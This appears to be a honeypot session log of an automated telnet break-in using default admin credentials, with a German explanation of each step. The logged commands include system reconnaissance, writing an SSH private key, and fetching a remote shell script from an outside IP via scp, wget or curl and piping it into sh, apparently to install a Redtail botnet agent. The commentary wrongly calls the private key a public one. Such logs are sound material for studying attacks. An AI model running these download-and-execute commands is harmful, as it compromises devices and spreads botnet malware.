01.10.2026, 14:34 UTC · 16 Befehle · über telnet · Indonesien
user='admin' pass='admin' admin@srv01:~$ id uid=1000(admin) gid=1000(admin) groups=1000(admin) admin@srv01:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A" auth_ok admin@srv01:~$ enable bash: enable: command not found admin@srv01:~$ system bash: system: command not found admin@srv01:~$ shell bash: shell: command not found admin@srv01:~$ sh admin@srv01:~$ bash admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY----- bash: syntax error near unexpected token `||' '-----BEGIN OPENSSH PRIVATE KEY----- admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ [Token] bash: [Token]: No such file or directory admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no bash: syntax error near unexpected token `newline' 'StrictHostKeyChecking no admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\… bash: syntax error near unexpected token `newline' redtail_bot_telnet_ok
Der Angreifer meldete sich über Telnet mit den Standardzugangsdaten admin und admin an. Nach einer kurzen Systemabfrage versuchte er, in eine tiefere Shell-Ebene zu wechseln. Anschließend lud er einen SSH-Schlüssel herunter und versuchte, ein Skript von einem externen Server zu beziehen und auszuführen.
Die Befehle id und cat /etc/passwd dienen der Erkundung der Benutzerrechte und des Systems. Der Befehl echo mit Hexadezimalwerten erzeugt die Zeichenkette auth_ok, was als Bestätigungssignal für ein automatisiertes Skript dient. Die folgenden Befehle enable, system, shell und sh versuchen, privilegierte Modi oder alternative Shells zu starten. Der lange Befehl speichert einen öffentlichen SSH-Schlüssel in eine Datei und konfiguriert SSH so, dass Host-Prüfungen übersprungen werden. Danach wird versucht, eine Datei namens out_sh über scp zu kopieren oder alternativ ein Skript von einer IP-Adresse herunterzuladen und sofort auszuführen.
Das Ziel war vermutlich die Installation einer Backdoor oder eines Botnet-Agents. Dies erkennt man am Versuch, ein externes Shell-Skript direkt über wget oder curl zu laden und auszuführen, was typisch für die Nachinstallation von Schadsoftware ist.
Dieses Muster ist sehr verbreitet und gehört zu den Standardangriffen auf IoT-Geräte mit schwachen Passwörtern.